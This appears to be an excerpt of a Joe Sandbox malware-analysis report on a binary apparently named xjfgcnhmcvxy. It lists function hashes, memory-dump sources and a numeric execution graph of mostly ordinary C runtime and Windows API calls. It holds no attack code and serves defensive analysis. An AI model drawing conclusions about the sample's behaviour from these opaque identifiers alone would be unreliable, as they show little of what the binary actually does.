                                                                                                              • Instruction Fuzzy Hash: EE01C622908E88C1E2529F1CD8011FAB375FF5975AF945361EA8C36224DF29D543CB10
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000010.00000002.1707594695.00007FF723471000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF723470000, based on PE: true
                                                                                                              • Associated: 00000010.00000002.1707564723.00007FF723470000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                              • Associated: 00000010.00000002.1707623365.00007FF72347C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                              • Associated: 00000010.00000002.1707871202.00007FF723678000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                              • Associated: 00000010.00000002.1707897386.00007FF72367C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                              • Associated: 00000010.00000002.1707923170.00007FF72367F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                              • Associated: 00000010.00000002.1707952036.00007FF723680000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_16_2_7ff723470000_xjfgcnhmcvxy.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: fprintf
                                                                                                              • String ID: Overflow range error (OVERFLOW)$_matherr(): %s in %s(%g, %g) (retval=%g)
                                                                                                              • API String ID: 383729395-4064033741
                                                                                                              • Opcode ID: 45e8a70f94a185c31541e1e23cfc07f2a2f839ba251156f79789ed1c5b7c23f7
                                                                                                              • Instruction ID: b615d6199fbfb8889fd0a023f795b45ee8a63afd8196777e3b7b6d0ef3c8ac99
                                                                                                              • Opcode Fuzzy Hash: 45e8a70f94a185c31541e1e23cfc07f2a2f839ba251156f79789ed1c5b7c23f7
                                                                                                              • Instruction Fuzzy Hash: ADF0C213908E8881D2519F28A8000BAB374FF4D78AF985365EB8C3A164DF28D6428B10
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000010.00000002.1707594695.00007FF723471000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF723470000, based on PE: true
                                                                                                              • Associated: 00000010.00000002.1707564723.00007FF723470000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                              • Associated: 00000010.00000002.1707623365.00007FF72347C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                              • Associated: 00000010.00000002.1707871202.00007FF723678000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                              • Associated: 00000010.00000002.1707897386.00007FF72367C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                              • Associated: 00000010.00000002.1707923170.00007FF72367F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                              • Associated: 00000010.00000002.1707952036.00007FF723680000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_16_2_7ff723470000_xjfgcnhmcvxy.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: fprintf
                                                                                                              • String ID: Total loss of significance (TLOSS)$_matherr(): %s in %s(%g, %g) (retval=%g)
                                                                                                              • API String ID: 383729395-4273532761
                                                                                                              • Opcode ID: 07577753afb37eb5fcf5d63ae4e73adc70741b58ff7b1f344ad0f27d0edc3f3e
                                                                                                              • Instruction ID: bc4bd3811f8e1a3a0fff8e20e2647c011380b33079980969f09e3b1b0e30be98
                                                                                                              • Opcode Fuzzy Hash: 07577753afb37eb5fcf5d63ae4e73adc70741b58ff7b1f344ad0f27d0edc3f3e
                                                                                                              • Instruction Fuzzy Hash: F5F0C213908E8881E2519F28A8000FAB374FF4D78AF985365EB8C3A124DF28D6428B10
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000010.00000002.1707594695.00007FF723471000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF723470000, based on PE: true
                                                                                                              • Associated: 00000010.00000002.1707564723.00007FF723470000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                              • Associated: 00000010.00000002.1707623365.00007FF72347C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                              • Associated: 00000010.00000002.1707871202.00007FF723678000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                              • Associated: 00000010.00000002.1707897386.00007FF72367C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                              • Associated: 00000010.00000002.1707923170.00007FF72367F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                              • Associated: 00000010.00000002.1707952036.00007FF723680000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_16_2_7ff723470000_xjfgcnhmcvxy.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: fprintf
                                                                                                              • String ID: The result is too small to be represented (UNDERFLOW)$_matherr(): %s in %s(%g, %g) (retval=%g)
                                                                                                              • API String ID: 383729395-2187435201
                                                                                                              • Opcode ID: eecb8fa550eb4f9658770f2b61e2844a682bd80113327cf1eeee3b9a414239df
                                                                                                              • Instruction ID: f177b928708753f50ed645cf3ff7e0814e0f9f5823fc776ec6e56b0cebd7acee
                                                                                                              • Opcode Fuzzy Hash: eecb8fa550eb4f9658770f2b61e2844a682bd80113327cf1eeee3b9a414239df
                                                                                                              • Instruction Fuzzy Hash: 8BF06213908E8881D2519F28AC011BAB375FF5D79AF995365EB8D3A164DF28D6428B10
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000010.00000002.1707594695.00007FF723471000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF723470000, based on PE: true
                                                                                                              • Associated: 00000010.00000002.1707564723.00007FF723470000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                              • Associated: 00000010.00000002.1707623365.00007FF72347C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                              • Associated: 00000010.00000002.1707871202.00007FF723678000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                              • Associated: 00000010.00000002.1707897386.00007FF72367C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                              • Associated: 00000010.00000002.1707923170.00007FF72367F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                              • Associated: 00000010.00000002.1707952036.00007FF723680000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_16_2_7ff723470000_xjfgcnhmcvxy.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: fprintf
                                                                                                              • String ID: Argument singularity (SIGN)$_matherr(): %s in %s(%g, %g) (retval=%g)
                                                                                                              • API String ID: 383729395-2468659920
                                                                                                              • Opcode ID: 9c1f99675411f496ebae98d8a9fd8c25414099954248e06b923c836f49d44bcd
                                                                                                              • Instruction ID: 06085cd50f073336f88beebda2183dc6345e8db6dac4998eecd7b8d28cb1e83e
                                                                                                              • Opcode Fuzzy Hash: 9c1f99675411f496ebae98d8a9fd8c25414099954248e06b923c836f49d44bcd
                                                                                                              • Instruction Fuzzy Hash: 48F0C213908E8881D2519F28A8000BBB374FF4D78AFA85366EB8C3A124DF28D6428B10
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000010.00000002.1707594695.00007FF723471000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF723470000, based on PE: true
                                                                                                              • Associated: 00000010.00000002.1707564723.00007FF723470000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                              • Associated: 00000010.00000002.1707623365.00007FF72347C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                              • Associated: 00000010.00000002.1707871202.00007FF723678000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                              • Associated: 00000010.00000002.1707897386.00007FF72367C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                              • Associated: 00000010.00000002.1707923170.00007FF72367F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                              • Associated: 00000010.00000002.1707952036.00007FF723680000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_16_2_7ff723470000_xjfgcnhmcvxy.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: fprintf
                                                                                                              • String ID: Partial loss of significance (PLOSS)$_matherr(): %s in %s(%g, %g) (retval=%g)
                                                                                                              • API String ID: 383729395-4283191376
                                                                                                              • Opcode ID: 14e8c9abfb476ad18acf1c5e7f73d1f4829812003753d9a42390f774e7430cee
                                                                                                              • Instruction ID: c67b168effc87094d87a4f2e8cd8bfefaf23421c14a2cb6a8ec1e1b99f1d3251
                                                                                                              • Opcode Fuzzy Hash: 14e8c9abfb476ad18acf1c5e7f73d1f4829812003753d9a42390f774e7430cee
                                                                                                              • Instruction Fuzzy Hash: 94F06213908E8881D2519F28A8011BAF375FF5D79AF995365EB8D3A164DF28D6428B10
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000010.00000002.1707594695.00007FF723471000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF723470000, based on PE: true
                                                                                                              • Associated: 00000010.00000002.1707564723.00007FF723470000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                              • Associated: 00000010.00000002.1707623365.00007FF72347C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                              • Associated: 00000010.00000002.1707871202.00007FF723678000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                              • Associated: 00000010.00000002.1707897386.00007FF72367C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                              • Associated: 00000010.00000002.1707923170.00007FF72367F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                              • Associated: 00000010.00000002.1707952036.00007FF723680000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_16_2_7ff723470000_xjfgcnhmcvxy.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: fprintf
                                                                                                              • String ID: Argument domain error (DOMAIN)$_matherr(): %s in %s(%g, %g) (retval=%g)
                                                                                                              • API String ID: 383729395-2713391170
                                                                                                              • Opcode ID: ccf22da0147750aef5dc2870aa310f6cc427e2b221e0b1b15f399e3b2fc4dc88
                                                                                                              • Instruction ID: b7897f3f3b68e8219411f468d1c10bbf5014b9cafb09e8b18fccb98a2f46a1f3
                                                                                                              • Opcode Fuzzy Hash: ccf22da0147750aef5dc2870aa310f6cc427e2b221e0b1b15f399e3b2fc4dc88
                                                                                                              • Instruction Fuzzy Hash: D0F09612808F8881D2419F28A8011BBB375FF5D78AF585365EF8C3A124DF28D5438B10
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000010.00000002.1707594695.00007FF723471000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF723470000, based on PE: true
                                                                                                              • Associated: 00000010.00000002.1707564723.00007FF723470000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                              • Associated: 00000010.00000002.1707623365.00007FF72347C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                              • Associated: 00000010.00000002.1707871202.00007FF723678000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                              • Associated: 00000010.00000002.1707897386.00007FF72367C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                              • Associated: 00000010.00000002.1707923170.00007FF72367F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                              • Associated: 00000010.00000002.1707952036.00007FF723680000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_16_2_7ff723470000_xjfgcnhmcvxy.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: memsetwcscatwcscpywcslen
                                                                                                              • String ID:
                                                                                                              • API String ID: 468205783-0
                                                                                                              • Opcode ID: 0ca46f2540f5f1eee9e4c55254821ceb4244cd7163d10c4abc465a41d223de76
                                                                                                              • Instruction ID: c45cc2a0cbc7bed125c938cec1a7a9346878fd673d4206b71c93fb404506fe74
                                                                                                              • Opcode Fuzzy Hash: 0ca46f2540f5f1eee9e4c55254821ceb4244cd7163d10c4abc465a41d223de76
                                                                                                              • Instruction Fuzzy Hash: E421D512A1878545E7A1EF22E8543BAF6A0FB55B89F8881B5EE4C57391EF7CD040C750
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000010.00000002.1707594695.00007FF723471000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF723470000, based on PE: true
                                                                                                              • Associated: 00000010.00000002.1707564723.00007FF723470000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                              • Associated: 00000010.00000002.1707623365.00007FF72347C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                              • Associated: 00000010.00000002.1707871202.00007FF723678000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                              • Associated: 00000010.00000002.1707897386.00007FF72367C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                              • Associated: 00000010.00000002.1707923170.00007FF72367F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                              • Associated: 00000010.00000002.1707952036.00007FF723680000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_16_2_7ff723470000_xjfgcnhmcvxy.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: CriticalSection$EnterLeavefree
                                                                                                              • String ID:
                                                                                                              • API String ID: 4020351045-0
                                                                                                              • Opcode ID: 3c65b183f754d1041ed0acf16b5e25c78a91340a247a1aeea4f14a11320141cc
                                                                                                              • Instruction ID: b6ed99890fa38186b876b966cbd046b8d8bcf561c04a2d3e8e0f0a053b533942
                                                                                                              • Opcode Fuzzy Hash: 3c65b183f754d1041ed0acf16b5e25c78a91340a247a1aeea4f14a11320141cc
                                                                                                              • Instruction Fuzzy Hash: B2113C61B1860B82FAD4BB61EC80139A3A6FF94B42BD444F0C41EAB260DF2CE554CA20

                                                                                                              Execution Graph

                                                                                                              Execution Coverage:14.3%
                                                                                                              Dynamic/Decrypted Code Coverage:0%
                                                                                                              Signature Coverage:0%
                                                                                                              Total number of Nodes:728
                                                                                                              Total number of Limit Nodes:3
                                                                                                              execution_graph 4120 7ff6b1a271e7 4121 7ff6b1a2720c 4120->4121 4122 7ff6b1a27204 4120->4122 4124 7ff6b1a2734c 4121->4124 4125 7ff6b1a27a1f wcslen 4121->4125 4128 7ff6b1a25f90 4122->4128 4126 7ff6b1a25a30 2 API calls 4124->4126 4127 7ff6b1a27364 4126->4127 4129 7ff6b1a25fd0 strlen 4128->4129 4130 7ff6b1a25fb5 4128->4130 4129->4130 4130->4129 4131 7ff6b1a2a6e9 SetUnhandledExceptionFilter 4132 7ff6b1a2726d 4133 7ff6b1a277d0 4132->4133 4135 7ff6b1a27276 4132->4135 4134 7ff6b1a25a30 2 API calls 4134->4135 4135->4134 4136 7ff6b1a279f9 4135->4136 4137 7ff6b1a27ef0 4140 7ff6b1a27be0 4137->4140 4141 7ff6b1a27bf3 4140->4141 4144 7ff6b1a296f0 4141->4144 4151 7ff6b1a295d0 4144->4151 4147 7ff6b1a29704 malloc 4148 7ff6b1a29731 4147->4148 4149 7ff6b1a27c14 4147->4149 4148->4149 4150 7ff6b1a29773 LeaveCriticalSection 4148->4150 4150->4149 4152 7ff6b1a29650 EnterCriticalSection 4151->4152 4153 7ff6b1a295e4 4151->4153 4157 7ff6b1a295e8 4152->4157 4155 7ff6b1a29621 InitializeCriticalSection InitializeCriticalSection 4153->4155 4153->4157 4154 7ff6b1a2960b 4154->4147 4154->4148 4155->4157 4156 7ff6b1a295f4 Sleep 4156->4156 4156->4157 4157->4152 4157->4154 4157->4156 4158 7ff6b1a24cf0 4159 7ff6b1a24cf8 4158->4159 4160 7ff6b1a24d00 TlsGetValue 4158->4160 4165 7ff6b1a24b70 4160->4165 4163 7ff6b1a24b70 free 4164 7ff6b1a24d44 4163->4164 4166 7ff6b1a24b9c TlsSetValue TlsFree 4165->4166 4167 7ff6b1a24b82 free 4165->4167 4166->4163 4167->4166 4169 7ff6b1a27e70 4174 7ff6b1a297f0 4169->4174 4172 7ff6b1a27be0 6 API calls 4173 7ff6b1a27ea0 4172->4173 4175 7ff6b1a27e78 4174->4175 4176 7ff6b1a297fd 4174->4176 4175->4172 4177 7ff6b1a295d0 4 API calls 4176->4177 4178 7ff6b1a29817 4177->4178 4178->4175 4179 7ff6b1a29840 LeaveCriticalSection 4178->4179 4183 7ff6b1a246f3 4184 7ff6b1a24721 4183->4184 4185 7ff6b1a24783 4184->4185 4186 7ff6b1a2472f 4184->4186 4187 7ff6b1a247a2 signal 4184->4187 4193 7ff6b1a24775 4184->4193 4188 7ff6b1a24790 4185->4188 4189 7ff6b1a2476c 4185->4189 4191 7ff6b1a247e0 4185->4191 4186->4191 4192 7ff6b1a24740 4186->4192 4186->4193 4187->4189 4190 7ff6b1a247b8 signal 4187->4190 4188->4187 4188->4189 4188->4193 4189->4193 4195 7ff6b1a24890 signal 4189->4195 4190->4193 4191->4189 4191->4193 4194 7ff6b1a247ee signal 4191->4194 4192->4189 4192->4193 4197 7ff6b1a24756 signal 4192->4197 4194->4189 4196 7ff6b1a248a9 signal 4194->4196 4195->4193 4196->4193 4197->4189 4198 7ff6b1a248c0 signal 4197->4198 4198->4193 4199 7ff6b1a277d9 4200 7ff6b1a277de localeconv 4199->4200 4201 7ff6b1a277d0 4199->4201 4204 7ff6b1a2a3a0 4200->4204 4205 7ff6b1a2a3ce 4204->4205 4208 7ff6b1a2a230 4205->4208 4207 7ff6b1a27818 4209 7ff6b1a2a363 4208->4209 4211 7ff6b1a2a245 4208->4211 4209->4207 4210 7ff6b1a2a301 4210->4207 4211->4210 4212 7ff6b1a2a2e4 4211->4212 4213 7ff6b1a2a279 IsDBCSLeadByteEx 4211->4213 4218 7ff6b1a2a294 4211->4218 4214 7ff6b1a2a330 MultiByteToWideChar 4212->4214 4215 7ff6b1a2a2ef 4212->4215 4213->4212 4213->4218 4214->4210 4217 7ff6b1a2a373 _errno 4214->4217 4215->4207 4216 7ff6b1a2a2be MultiByteToWideChar 4216->4217 4219 7ff6b1a2a2d8 4216->4219 4217->4210 4218->4210 4218->4216 4219->4207 4220 7ff6b1a272da 4222 7ff6b1a272e8 4220->4222 4221 7ff6b1a279f9 4222->4221 4223 7ff6b1a25a30 2 API calls 4222->4223 4223->4222 3751 7ff6b1a214e0 3754 7ff6b1a21180 3751->3754 3753 7ff6b1a214f6 3755 7ff6b1a21480 GetStartupInfoW 3754->3755 3756 7ff6b1a211b4 3754->3756 3762 7ff6b1a213ee 3755->3762 3757 7ff6b1a211dc Sleep 3756->3757 3758 7ff6b1a211f1 3756->3758 3757->3756 3759 7ff6b1a2144c _initterm 3758->3759 3760 7ff6b1a21224 3758->3760 3758->3762 3759->3760 3772 7ff6b1a24330 3760->3772 3762->3753 3763 7ff6b1a2124c SetUnhandledExceptionFilter 3764 7ff6b1a2126f 3763->3764 3765 7ff6b1a212f3 malloc 3764->3765 3766 7ff6b1a213b5 3765->3766 3770 7ff6b1a2131e 3765->3770 3794 7ff6b1a21560 3766->3794 3767 7ff6b1a2134d 3768 7ff6b1a21351 malloc memcpy 3767->3768 3767->3770 3768->3767 3771 7ff6b1a213b0 3768->3771 3770->3767 3770->3770 3771->3766 3773 7ff6b1a24352 3772->3773 3775 7ff6b1a24363 3772->3775 3773->3763 3774 7ff6b1a24612 3774->3773 3776 7ff6b1a2461b 3774->3776 3775->3773 3775->3774 3790 7ff6b1a243db 3775->3790 3777 7ff6b1a24130 8 API calls 3776->3777 3780 7ff6b1a24665 3776->3780 3777->3776 3778 7ff6b1a24692 3779 7ff6b1a240c0 8 API calls 3778->3779 3782 7ff6b1a2469e 3779->3782 3921 7ff6b1a240c0 3780->3921 3782->3763 3783 7ff6b1a24130 8 API calls 3788 7ff6b1a24431 3783->3788 3784 7ff6b1a2467e 3786 7ff6b1a240c0 8 API calls 3784->3786 3785 7ff6b1a245fc 3787 7ff6b1a24130 8 API calls 3785->3787 3786->3778 3789 7ff6b1a2460d 3787->3789 3788->3783 3788->3790 3792 7ff6b1a244b3 3788->3792 3890 7ff6b1a24130 3788->3890 3789->3763 3790->3773 3790->3778 3790->3780 3790->3784 3790->3785 3790->3788 3790->3792 3792->3773 3793 7ff6b1a244e2 VirtualProtect 3792->3793 3793->3792 3795 7ff6b1a21576 3794->3795 3951 7ff6b1a25420 3795->3951 3797 7ff6b1a2160e 3798 7ff6b1a25420 19 API calls 3797->3798 3800 7ff6b1a2161d 3798->3800 3799 7ff6b1a21688 wcscpy wcslen 3979 7ff6b1a23dde 3799->3979 3800->3799 3800->3800 3802 7ff6b1a21721 memset 3803 7ff6b1a25420 19 API calls 3802->3803 3804 7ff6b1a21767 3803->3804 3805 7ff6b1a21777 3804->3805 3807 7ff6b1a25420 19 API calls 3804->3807 3806 7ff6b1a25420 19 API calls 3805->3806 3808 7ff6b1a217a7 3806->3808 3807->3805 3809 7ff6b1a25420 19 API calls 3808->3809 3810 7ff6b1a2180f 3809->3810 3811 7ff6b1a25420 19 API calls 3810->3811 3812 7ff6b1a2181e 3811->3812 3813 7ff6b1a21884 _wgetenv 3812->3813 3814 7ff6b1a231d0 3813->3814 3815 7ff6b1a218a9 memset 3814->3815 3816 7ff6b1a25420 19 API calls 3815->3816 3817 7ff6b1a218e4 3816->3817 3818 7ff6b1a25420 19 API calls 3817->3818 3819 7ff6b1a218f3 3818->3819 3820 7ff6b1a21969 memset 3819->3820 3821 7ff6b1a25420 19 API calls 3820->3821 3822 7ff6b1a219fd 3821->3822 3823 7ff6b1a21a0d 3822->3823 3824 7ff6b1a25420 19 API calls 3822->3824 3825 7ff6b1a25420 19 API calls 3823->3825 3824->3823 3826 7ff6b1a21a3f 3825->3826 3827 7ff6b1a21a96 memset 3826->3827 3828 7ff6b1a25420 19 API calls 3827->3828 3829 7ff6b1a21adf 3828->3829 3830 7ff6b1a21aef 3829->3830 3832 7ff6b1a25420 19 API calls 3829->3832 3831 7ff6b1a25420 19 API calls 3830->3831 3833 7ff6b1a21b20 3831->3833 3832->3830 3834 7ff6b1a25420 19 API calls 3833->3834 3835 7ff6b1a21b8f 3834->3835 3836 7ff6b1a25420 19 API calls 3835->3836 3837 7ff6b1a21ba0 3836->3837 3838 7ff6b1a21c07 _wgetenv 3837->3838 3839 7ff6b1a231d0 3838->3839 3840 7ff6b1a21c23 memset 3839->3840 3841 7ff6b1a25420 19 API calls 3840->3841 3842 7ff6b1a21c6b 3841->3842 3843 7ff6b1a25420 19 API calls 3842->3843 3844 7ff6b1a21c7c 3843->3844 3845 7ff6b1a25420 19 API calls 3844->3845 3846 7ff6b1a21d1c 3845->3846 3847 7ff6b1a25420 19 API calls 3846->3847 3848 7ff6b1a21d2d 3847->3848 3849 7ff6b1a21d9a _wgetenv 3848->3849 3850 7ff6b1a21db5 3849->3850 3981 7ff6b1a22bf0 memset 3850->3981 3852 7ff6b1a21dc5 3853 7ff6b1a25420 19 API calls 3852->3853 3854 7ff6b1a21dd4 3853->3854 3855 7ff6b1a21de4 3854->3855 3857 7ff6b1a25420 19 API calls 3854->3857 3856 7ff6b1a25420 19 API calls 3855->3856 3858 7ff6b1a21e12 3856->3858 3857->3855 3859 7ff6b1a25420 19 API calls 3858->3859 3860 7ff6b1a21e99 3859->3860 3861 7ff6b1a25420 19 API calls 3860->3861 3863 7ff6b1a21ea8 3861->3863 3863->3863 4033 7ff6b1a23680 3863->4033 3864 7ff6b1a21fd5 _wcsicmp 3887 7ff6b1a21f1f 3864->3887 3866 7ff6b1a23980 23 API calls 3866->3887 3867 7ff6b1a22022 memcpy 3868 7ff6b1a25420 19 API calls 3867->3868 3870 7ff6b1a22045 3868->3870 3869 7ff6b1a25420 19 API calls 3869->3870 3870->3869 3871 7ff6b1a22063 memcpy 3870->3871 4039 7ff6b1a22b30 3870->4039 3871->3870 3873 7ff6b1a220ef memcpy 3874 7ff6b1a25420 19 API calls 3873->3874 3881 7ff6b1a22112 3874->3881 3875 7ff6b1a2226b 3876 7ff6b1a25420 19 API calls 3875->3876 3878 7ff6b1a2227c memcpy 3876->3878 3877 7ff6b1a25420 19 API calls 3877->3881 3879 7ff6b1a222b2 3878->3879 4046 7ff6b1a23830 3879->4046 3880 7ff6b1a22b30 34 API calls 3880->3881 3881->3875 3881->3877 3881->3879 3881->3880 3882 7ff6b1a2219d memcpy 3881->3882 3883 7ff6b1a25420 19 API calls 3882->3883 3883->3887 3885 7ff6b1a222cc 3885->3885 3886 7ff6b1a25420 19 API calls 3886->3887 3887->3864 3887->3866 3887->3867 3887->3886 3888 7ff6b1a221d8 memcpy 3887->3888 3889 7ff6b1a22b30 34 API calls 3887->3889 4036 7ff6b1a23100 3887->4036 3888->3887 3889->3887 3891 7ff6b1a242c0 3890->3891 3893 7ff6b1a24152 3890->3893 3891->3790 3892 7ff6b1a241fe 3892->3790 3892->3892 3893->3892 3894 7ff6b1a24312 3893->3894 3896 7ff6b1a241bc VirtualQuery 3893->3896 3895 7ff6b1a240c0 4 API calls 3894->3895 3903 7ff6b1a24321 3895->3903 3897 7ff6b1a241ea 3896->3897 3898 7ff6b1a242f5 3896->3898 3897->3892 3900 7ff6b1a24270 VirtualProtect 3897->3900 3899 7ff6b1a240c0 4 API calls 3898->3899 3899->3894 3900->3892 3901 7ff6b1a242ac GetLastError 3900->3901 3902 7ff6b1a240c0 4 API calls 3901->3902 3902->3891 3904 7ff6b1a243db 3903->3904 3907 7ff6b1a24612 3903->3907 3920 7ff6b1a24352 3903->3920 3906 7ff6b1a24692 3904->3906 3909 7ff6b1a24665 3904->3909 3911 7ff6b1a24130 VirtualQuery VirtualProtect GetLastError VirtualProtect 3904->3911 3912 7ff6b1a2467e 3904->3912 3913 7ff6b1a245fc 3904->3913 3918 7ff6b1a244b3 3904->3918 3904->3920 3905 7ff6b1a24130 4 API calls 3905->3907 3908 7ff6b1a240c0 4 API calls 3906->3908 3907->3905 3907->3909 3907->3920 3914 7ff6b1a2469e 3908->3914 3910 7ff6b1a240c0 4 API calls 3909->3910 3910->3912 3911->3904 3915 7ff6b1a240c0 4 API calls 3912->3915 3916 7ff6b1a24130 4 API calls 3913->3916 3914->3790 3915->3906 3917 7ff6b1a2460d 3916->3917 3917->3790 3919 7ff6b1a244e2 VirtualProtect 3918->3919 3918->3920 3919->3918 3920->3790 3922 7ff6b1a240ec 3921->3922 3923 7ff6b1a241fe 3922->3923 3924 7ff6b1a24312 3922->3924 3926 7ff6b1a241bc VirtualQuery 3922->3926 3923->3784 3923->3923 3925 7ff6b1a240c0 4 API calls 3924->3925 3934 7ff6b1a24321 3925->3934 3927 7ff6b1a241ea 3926->3927 3928 7ff6b1a242f5 3926->3928 3927->3923 3931 7ff6b1a24270 VirtualProtect 3927->3931 3930 7ff6b1a240c0 4 API calls 3928->3930 3929 7ff6b1a24352 3929->3784 3930->3924 3931->3923 3932 7ff6b1a242ac GetLastError 3931->3932 3933 7ff6b1a240c0 4 API calls 3932->3933 3933->3923 3934->3929 3937 7ff6b1a24612 3934->3937 3947 7ff6b1a243db 3934->3947 3935 7ff6b1a24130 4 API calls 3935->3937 3936 7ff6b1a24692 3938 7ff6b1a240c0 4 API calls 3936->3938 3937->3929 3937->3935 3939 7ff6b1a24665 3937->3939 3941 7ff6b1a2469e 3938->3941 3940 7ff6b1a240c0 4 API calls 3939->3940 3943 7ff6b1a2467e 3940->3943 3941->3784 3942 7ff6b1a24130 VirtualQuery VirtualProtect GetLastError VirtualProtect 3942->3947 3945 7ff6b1a240c0 4 API calls 3943->3945 3944 7ff6b1a245fc 3946 7ff6b1a24130 4 API calls 3944->3946 3945->3936 3948 7ff6b1a2460d 3946->3948 3947->3929 3947->3936 3947->3939 3947->3942 3947->3943 3947->3944 3949 7ff6b1a244b3 3947->3949 3948->3784 3949->3929 3950 7ff6b1a244e2 VirtualProtect 3949->3950 3950->3949 3952 7ff6b1a2543e 3951->3952 3957 7ff6b1a25458 3951->3957 3952->3797 3953 7ff6b1a25461 GetLastError TlsGetValue SetLastError 3962 7ff6b1a25540 3953->3962 3964 7ff6b1a2548f 3953->3964 3954 7ff6b1a255ea 3954->3953 3955 7ff6b1a255f7 3954->3955 3955->3797 3956 7ff6b1a2549b 3956->3952 3963 7ff6b1a254a9 3956->3963 3957->3953 3957->3954 3960 7ff6b1a255d1 3957->3960 3961 7ff6b1a25622 3957->3961 3966 7ff6b1a254ec 3957->3966 3958 7ff6b1a254fa 3958->3953 3958->3955 3975 7ff6b1a2551f ReleaseSemaphore 3958->3975 3959 7ff6b1a2564c WaitForSingleObject 3959->3958 4058 7ff6b1a253c0 CreateSemaphoreW TlsAlloc 3960->4058 3965 7ff6b1a2563c 3961->3965 3961->3966 3967 7ff6b1a25560 3962->3967 3968 7ff6b1a25673 abort 3962->3968 4051 7ff6b1a25320 3963->4051 3964->3956 3964->3968 3974 7ff6b1a255b5 memset 3964->3974 3971 7ff6b1a25640 Sleep 3965->3971 3966->3954 3966->3958 3966->3959 3972 7ff6b1a25563 TlsSetValue 3967->3972 3978 7ff6b1a25685 3968->3978 3971->3971 3976 7ff6b1a2564a 